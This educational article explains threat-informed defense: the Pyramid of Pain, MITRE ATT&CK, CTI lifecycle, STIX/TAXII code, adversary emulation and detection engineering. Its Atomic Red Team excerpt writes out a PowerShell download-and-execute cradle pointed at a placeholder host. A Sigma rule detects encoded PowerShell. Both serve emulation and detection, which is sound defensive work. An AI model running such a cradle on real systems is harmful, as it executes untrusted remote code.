Threat-Informed Defense: Principles, Frameworks, and the Intelligence-Driven Security Cycle

Objective: Understand how defenders operationalize adversary knowledge — the Pyramid of Pain, MITRE ATT&CK, the CTI lifecycle, STIX/TAXII, M3TID/INFORM, and adversary emulation — into a continuous, measurable intelligence-driven security cycle rather than reacting to brittle indicators.

1. The Problem With Reactive Defense

Indicator-centric programs fail because indicators are cheap for the adversary to change. Hashes, IP addresses, and domains rotate trivially — a recompile changes a hash; a new VPS changes an IP. As popularized by David Bianco’s Pyramid of Pain (2013), these atomic indicators detect an adversary only for a fleeting window.

The Pyramid ranks indicator types by how much pain it causes an adversary to change them:

Indicator Type	Cost to Adversary
Hash values	Trivial
IP addresses	Easy
Domain names	Simple
Network/host artifacts	Annoying
Tools	Challenging
TTPs (Tactics, Techniques, Procedures)	Tough

Documenting activity at the TTP level lets defenders think at an abstraction that is concrete enough to be actionable, yet stable enough to remain valid across adversaries and over time. Unlike traditional models that focus on indicators of compromise (IOCs), behavioral defense maps how adversaries operate once inside the environment. That is the foundation of Threat-Informed Defense.

Pyramid of Pain hierarchy showing TTPs at the apex causing the most adversary pain down to hash values at the base causing the least — The Pyramid of Pain: indicators near the base are trivial for adversaries to rotate; TTPs at the apex represent durable, costly-to-change behavior.

2. What Is Threat-Informed Defense?

Threat-Informed Defense (TID) is the systematic application of a deep understanding of adversary tradecraft and technology to improve defenses. The MITRE Center for Threat-Informed Defense (CTID) defines it across three operationalized dimensions:

Dimension	Question It Answers
Cyber Threat Intelligence (CTI)	Who are our adversaries and which TTPs do they use?
Defensive Measures (DM)	Do we prevent, detect, and mitigate those specific TTPs?
Testing & Evaluation (T&E)	Can we prove it by emulating realistic adversary behavior?

The shift is from “Are we patched?” to “Are we defended against these adversaries?” TID is a mindset that prioritizes finite defensive budget against the behaviors that actually threaten your sector.

3. MITRE ATT&CK: Architecture and Anatomy

The MITRE ATT&CK® Framework is a globally accessible knowledge base of adversary TTPs based on real-world observations. Its core objects:

Component	Details
Tactics	Adversary goals (the why); 14 Enterprise columns.
Techniques / Sub-techniques	How a goal is achieved; ID format `TNNNN` / `TNNNN.NNN`.
Groups	Named threat-actor profiles (e.g., APT29, FIN7) with mapped techniques.
Software	Malware and tools observed in intrusions.
Mitigations & Data Sources	Controls that counter a technique; telemetry that observes it.
Matrices	Enterprise plus ICS, Mobile, and Cloud variants.

The 14 Enterprise tactics, in order: Reconnaissance (TA0043), Resource Development (TA0042), Initial Access (TA0001), Execution (TA0002), Persistence (TA0003), Privilege Escalation (TA0004), Defense Evasion (TA0005), Credential Access (TA0006), Discovery (TA0007), Lateral Movement (TA0008), Collection (TA0009), Command and Control (TA0011), Exfiltration (TA0010), Impact (TA0040). ATT&CK is versioned — always confirm IDs against attack.mitre.org.

ATT&CK is distributed as STIX 2.1. You can parse the public bundle directly to enumerate every technique:

from stix2 import MemoryStore, Filter

store = MemoryStore()
store.load_from_file("enterprise-attack.json")  # mitre/cti repo

for t in store.query([Filter("type", "=", "attack-pattern")]):
    for ref in t.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            print(ref["external_id"], "-", t["name"])

ATT&CK Navigator visualizes and compares coverage layers (JSON format), while ATT&CK Workbench lets organizations manage and extend a local copy of the knowledge base in sync with the public one.

4. The CTI Lifecycle: From Raw Data to Prioritized TTPs

Intelligence is produced, not collected ad hoc. The six-phase CTI lifecycle maps cleanly onto the TID dimensions:

Phase	Purpose
Direction	Define intelligence requirements (which sector adversaries matter).
Collection	Pull from feeds, ISACs, internal incidents.
Processing	Normalize and structure raw data.
Analysis	Extract TTPs, attribute, and prioritize.
Dissemination	Deliver to detection engineering / leadership.
Feedback	Refine requirements from what the consumers needed.

Structured intelligence is exchanged with STIX 2.1 (the data model) over TAXII 2.1 (the transport, supporting Collections and Channels). Open platforms — MISP and OpenCTI — ingest STIX bundles manually, via connectors, or by subscribing to a TAXII feed.

A minimal shareable STIX bundle links a threat actor to a technique through a relationship:

from stix2 import ThreatActor, AttackPattern, Relationship, Bundle, ExternalReference

actor = ThreatActor(name="APT29", labels=["nation-state"])

technique = AttackPattern(
    name="Spearphishing Attachment",
    external_references=[ExternalReference(
        source_name="mitre-attack",
        external_id="T1566.001",
        url="https://attack.mitre.org/techniques/T1566/001")])

rel = Relationship(actor, "uses", technique)
print(Bundle(actor, technique, rel).serialize(pretty=True))

Automating the loop turns a TAXII feed into a prioritized TTP list for the detection team:

from taxii2client.v21 import Server
from stix2 import parse
import csv

server = Server("https://taxii.example-isac.org/taxii2/",
                user="analyst", password="<token>")
collection = server.api_roots[0].collections[0]

ttps = []
for obj in collection.get_objects().get("objects", []):
    so = parse(obj, allow_custom=True)
    if so.get("type") == "attack-pattern":
        for ref in so.get("external_references", []):
            if ref.get("source_name") == "mitre-attack":
                ttps.append((ref["external_id"], so["name"]))

with open("prioritized_ttps.csv", "w", newline="") as f:
    csv.writer(f).writerows([("technique_id", "name"), *sorted(set(ttps))])

Flow diagram mapping the six-phase CTI lifecycle through STIX/TAXII dissemination into the three TID dimensions of defensive measures, testing and evaluation, and feedback — The six-phase CTI lifecycle feeds prioritized TTPs directly into TID’s three operational dimensions, forming a closed, self-improving loop.

5. Building a Sector-Specific Threat Model

You cannot defend against everything, so prioritize. Select the ATT&CK Groups relevant to your sector, extract their techniques, and weight by frequency using CTID’s Sightings Ecosystem data and the Top ATT&CK Techniques Calculator.

The mitreattack-python library pulls a group’s full technique set:

from mitreattack.stix20 import MitreAttackData

data = MitreAttackData("enterprise-attack.json")
apt29 = data.get_groups_by_alias("APT29")[0]

for entry in data.get_techniques_used_by_group(apt29.id):
    tech = entry["object"]
    print(data.get_attack_id(tech.id), tech["name"])

Layer the result in the Navigator and colour cells by your current detection status. A layer file encodes that scoring directly:

{
  "name": "Detection Coverage - APT29",
  "versions": { "attack": "16", "navigator": "5.1.0", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "color": "#fc3b3b", "comment": "None - no email detonation telemetry" },
    { "techniqueID": "T1059.001", "color": "#33cc33", "comment": "Detected - Script Block Logging" },
    { "techniqueID": "T1055",     "color": "#ffe766", "comment": "Partial - EDR on workstations only" }
  ]
}

6. Mapping Controls to ATT&CK: The Defensive Measures Dimension

Knowing the adversary is useless without knowing your own coverage. CTID’s Mappings Explorer lets defenders see how security capabilities map to ATT&CK, and the NIST SP 800-53 ↔ ATT&CK mappings let you assess control coverage against real-world techniques.

The critical pitfall: ATT&CK coverage ≠ detection coverage. A control that can mitigate a technique is not the same as telemetry that proves you detect it. Distinguish two gap types:

Gap Type	Meaning
Coverage gap	No control or telemetry exists for the technique.
Detection gap	Telemetry exists, but no analytic fires on it.

Re-run the Mappings Explorer comparison before and after each emulation cycle to quantify the coverage delta — that delta is your measurable program improvement.

7. Testing & Evaluation: Closing the Loop

T&E proves defenses work by emulating real adversary behavior. Distinguish the disciplines:

Approach	Focus
Penetration testing	Find exploitable vulnerabilities.
Adversary emulation	Reproduce a specific actor’s TTP chain.
Breach & Attack Simulation (BAS)	Continuous, automated technique validation.

MITRE CALDERA is a scalable, automated adversary-emulation platform; Atomic Red Team (Red Canary) is a library of small, ATT&CK-mapped tests for fast technique validation; and the CTID Adversary Emulation Library provides full emulation plans modeled on real threats. Run them as purple-team exercises — red executes, blue observes, both tune in real time.

# T1059.001 - atomic test metadata (excerpt)
attack_technique: T1059.001
display_name: PowerShell
atomic_tests:
  - name: Download cradle execution
    executor:
      name: powershell
      command: |
        IEX (New-Object Net.WebClient).DownloadString('#{cradle_url}')
    input_arguments:
      cradle_url:
        type: url
        default: https://example.test/benign.ps1

# Execute one atomic test, then confirm the telemetry fired
Invoke-AtomicTest T1059.001 -TestNumbers 1
# Map result -> Navigator: green only if Sysmon EID 1 + Script Block Log observed

If the test fires but no analytic alerts, you have found a detection gap — feed it straight back into the cycle.

8. M3TID and INFORM: Measuring Program Maturity

CTID’s M3TID (Measure, Maximize, Mature Threat-Informed Defense) operationalizes the three dimensions and assigns relative weighting:

Dimension	Weight
Cyber Threat Intelligence	30%
Defensive Measures	50%
Testing & Evaluation	20%

The weighting reflects that defensive measures are where threat knowledge becomes protection. INFORM (Jan 2026) builds on M3TID, translating CTI, defensive measures, and T&E into a measurable, repeatable strategic maturity practice. Treat M3TID as the foundational reference and INFORM as its strategic-maturity successor — they are distinct publications, not synonyms. Self-assess each dimension, then invest where the lowest-weighted-adjusted score sits.

9. The Intelligence-Driven Security Cycle: Putting It All Together

The dimensions form a continuous loop, not a one-time audit:

Direction/CTI: Ingest sector intelligence via TAXII; extract prioritized TTPs.
Threat model: Layer relevant ATT&CK Groups in Navigator.
Defensive measures: Map controls via Mappings Explorer; identify gaps.
T&E: Emulate the TTP chain with CALDERA / Atomic Red Team.
Measure: Score coverage delta and M3TID maturity.
Feedback: Failed detections become new CTI collection requirements.

Each rotation tightens coverage against the adversaries you actually face. The loop never closes — new sightings continuously reshape the threat model.

Cyclical graph showing the intelligence-driven security cycle flowing from CTI ingest through threat modelling, gap analysis, adversary emulation, and maturity measurement back to new collection requirements — The intelligence-driven security cycle is self-reinforcing: failed detections become collection requirements that sharpen the next rotation.

10. Common Pitfalls and Maturity Anti-Patterns

The “ATT&CK checkbox” fallacy — colouring a cell green for a control that is mapped but never validated.
Retroactive labeling — tagging alerts with technique IDs after the fact instead of engineering proactive detections.
IOC over-reliance — building the program on indicators near the bottom of the Pyramid of Pain.
Treating the matrix as static — ATT&CK is versioned; threat models decay if not refreshed.
Stale TTPs — driving investment from sightings years old without re-validation.

11. Common Attacker Techniques

These are the behaviors a TID program is built to detect — the worked examples throughout the cycle:

Technique	Description
`T1566` Phishing / `T1566.001` Spearphishing Attachment	Initial Access; canonical threat-modeling example (used by APT29).
`T1059.001` PowerShell	Execution; most common sub-technique in emulation runs.
`T1053` Scheduled Task/Job	Persistence; linked to FIN7 in ATT&CK.
`T1055` Process Injection	Defense Evasion; illustrates a deep sub-technique hierarchy.
`T1078` Valid Accounts	Credential Access/Persistence; shows why behavior beats IOCs.
`T1021` Remote Services	Lateral Movement; common in sector threat models.
`T1486` Data Encrypted for Impact	Impact; ransomware-focused modeling.

12. Defensive Strategies & Detection

TID succeeds only if emulation is observable. Validate that the following telemetry fires during every T&E run:

Source	Detail
Sysmon Event ID 1	Process Create — baseline for technique execution (`Image`, `CommandLine`, `ParentImage`, `Hashes`).
Sysmon Event ID 3	Network Connect — C2 simulation (`DestinationIp`, `DestinationPort`, `Image`).
Sysmon Event ID 11	File Create — emulation artifact drops (`TargetFilename`).
Security Event 4688	Native process creation; requires Audit Process Creation + command-line logging GPO.
Security Event 4624 / 4625	Logon success/failure — credential-access techniques.
PowerShell Script Block Logging	ETW `Microsoft-Windows-PowerShell` (`{A0C1853B-5C40-4B15-8766-3CF1C58F985A}`) — captures `T1059.001`.
ETW `Microsoft-Windows-Threat-Intelligence`	Kernel provider consumed by EDR for `T1055.*` injection patterns.

Anchor every detection to an ATT&CK ID so coverage is measurable. A skeleton Sigma rule for encoded PowerShell:

title: Suspicious PowerShell Encoded Command Execution
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
  condition: selection
tags:
  - attack.execution
  - attack.t1059.001
  - attack.ta0002
level: medium

Hardening baselines: enable command-line process auditing (ProcessCreationIncludeCmdLine_Enabled); enforce PowerShell Constrained Language Mode with Script Block and Module Logging; deploy Sysmon with a maintained config (e.g., SwiftOnSecurity) validated against each technique’s ATT&CK data sources; enforce a TTP expiry policy (re-validate sightings older than 24 months); and configure automated TAXII ingest from ISAC/CERT networks.

13. Tools for Threat-Informed Defense

Tool	Description	Link
ATT&CK Navigator	Layer-based technique coverage visualization	`attack.mitre.org`
ATT&CK Workbench	Manage and extend a local ATT&CK copy	`ctid.mitre.org`
MISP	Open-source threat-intelligence platform (STIX/TAXII)	`misp-project.org`
OpenCTI	STIX 2.1 ingestion via connectors and TAXII	`filigran.io`
MITRE CALDERA	Automated adversary emulation	`caldera.mitre.org`
Atomic Red Team	ATT&CK-mapped atomic test library	`atomicredteam.io`
Mappings Explorer	Security controls mapped to ATT&CK	`ctid.mitre.org`
Sigma	SIEM-agnostic detection rule standard	`sigmahq.io`

14. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Phishing / Spearphishing Attachment	`T1566` / `T1566.001`	Mail-gateway detonation; Sysmon EID 1/11 on child processes.
PowerShell	`T1059.001`	Script Block Logging; Sigma on `-enc`.
Scheduled Task/Job	`T1053`	Security Event 4698; Sysmon EID 1 (`schtasks.exe`).
Process Injection	`T1055`	ETW `Threat-Intelligence`; EDR memory analytics.
Valid Accounts	`T1078`	Security Event 4624 anomaly baselining.
Remote Services	`T1021`	Sysmon EID 3; logon-type correlation.
Data Encrypted for Impact	`T1486`	Sysmon EID 11 mass-write; canary files.

Summary

Threat-Informed Defense replaces brittle IOC reaction with stable, behavior-centric defense built on adversary TTPs.
The Pyramid of Pain motivates the shift; MITRE ATT&CK supplies the shared TTP vocabulary across Tactics, Techniques, Groups, and Mitigations.
TID’s three dimensions — CTI, Defensive Measures, Testing & Evaluation — connect through the six-phase CTI lifecycle and exchange intelligence via STIX 2.1 over TAXII 2.1.
M3TID measures maturity (CTI 30%, DM 50%, T&E 20%); INFORM is its strategic successor.
Close the loop with CALDERA, Atomic Red Team, and the CTID Adversary Emulation Library, validating every technique against Sysmon and ATT&CK-tagged Sigma rules.

Archive